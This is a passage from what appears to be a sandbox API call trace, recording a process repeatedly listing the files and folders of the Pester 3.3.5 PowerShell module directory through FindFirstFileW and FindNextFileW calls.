Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0xafa508df90 | out: lpFindFileData=0xafa508df90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b5670 [0151.948] FindNextFileW (in: hFindFile=0x2386d3b5670, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.948] FindNextFileW (in: hFindFile=0x2386d3b5670, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0151.949] FindNextFileW (in: hFindFile=0x2386d3b5670, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.949] FindClose (in: hFindFile=0x2386d3b5670 | out: hFindFile=0x2386d3b5670) returned 1 [0151.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0151.949] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0xafa508df90 | out: lpFindFileData=0xafa508df90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b51f0 [0151.949] FindNextFileW (in: hFindFile=0x2386d3b51f0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.950] FindNextFileW (in: hFindFile=0x2386d3b51f0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0151.950] FindNextFileW (in: hFindFile=0x2386d3b51f0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0151.950] FindClose (in: hFindFile=0x2386d3b51f0 | out: hFindFile=0x2386d3b51f0) returned 1 [0151.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e0f0) returned 1 [0151.950] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xafa508dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0151.951] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0xafa508de00 | out: lpFindFileData=0xafa508de00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b55b0 [0151.953] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.953] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0151.953] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0151.953] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0151.953] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0151.954] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0151.954] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0151.954] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0151.954] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0151.954] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0151.955] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0151.955] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0151.955] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0151.955] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0151.955] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0151.955] FindNextFileW (in: hFindFile=0x2386d3b55b0, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.955] FindClose (in: hFindFile=0x2386d3b55b0 | out: hFindFile=0x2386d3b55b0) returned 1 [0151.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e020) returned 1 [0151.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfe0) returned 1 [0151.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e0f0) returned 1 [0151.957] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xafa508dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0151.957] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0xafa508de00 | out: lpFindFileData=0xafa508de00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4710 [0151.958] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.958] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0151.958] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0151.958] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0151.958] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0151.958] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0151.959] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0151.959] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0151.959] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0151.959] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0151.959] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0151.959] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0151.960] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0151.960] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0151.960] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0151.960] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0151.960] FindClose (in: hFindFile=0x2386d3b4710 | out: hFindFile=0x2386d3b4710) returned 1 [0151.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e020) returned 1 [0151.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfe0) returned 1 [0151.961] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, 